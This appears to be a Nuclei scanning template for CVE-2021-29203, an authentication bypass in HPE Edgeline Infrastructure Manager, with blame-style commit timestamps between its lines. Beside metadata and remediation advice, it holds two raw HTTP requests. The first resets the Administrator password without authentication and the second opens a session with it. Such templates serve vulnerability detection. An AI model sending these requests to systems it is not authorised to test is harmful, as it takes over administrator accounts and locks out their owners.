2021-06-26 08:10:30 +00:00
id : CVE-2021-29203
2022-04-22 10:38:41 +00:00
2021-06-26 08:10:30 +00:00
info :
2022-05-18 20:58:07 +00:00
name : HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass
2021-06-26 08:10:30 +00:00
author : madrobot
severity : critical
2022-05-18 20:58:07 +00:00
description : HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could result in unauthorized access to sensitive information, unauthorized configuration changes, or disruption of the affected system.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to HPE Edgeline Infrastructure Manager version 1.22 or later to mitigate this vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.tenable.com/security/research/tra-2021-15
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203
2022-05-17 09:18:12 +00:00
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-29203
2023-07-11 19:49:27 +00:00
cwe-id : CWE-306
2023-12-12 11:07:52 +00:00
epss-score : 0.95733
2024-01-14 13:49:27 +00:00
epss-percentile : 0.9929
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : hp
product : edgeline_infrastructure_manager
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,hpe,bypass,tenable,hp
2021-06-26 08:10:30 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-06-26 08:10:30 +00:00
- raw :
- |
PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/json
2021-06-30 15:57:06 +00:00
{"Password" : "{{randstr}}" }
2021-06-26 08:10:30 +00:00
- |
POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
2021-06-30 15:57:06 +00:00
{"UserName" : "Administrator" , "Password" : "{{randstr}}" }
2021-06-26 08:10:30 +00:00
matchers-condition : and
matchers :
- type : word
2021-06-30 15:57:06 +00:00
part : header
2021-06-26 08:10:30 +00:00
words :
- "X-Auth-Token"
- "PasswordReset"
- "Location"
2023-07-11 19:49:27 +00:00
condition : and
2021-06-30 15:57:06 +00:00
2021-06-26 08:10:30 +00:00
- type : word
part : body
2021-06-30 15:57:06 +00:00
words :
- "Base.1.0.Created"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 201
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022100c9366ce12467df083ef305ed2912e07ab41d4e4845563a594a01c2fbe41aabea0220202ef001043a7a448bf58d612121de314dbc031cef4089824963c6e368a2379d:922c64590222798bb761d5b6d8e72950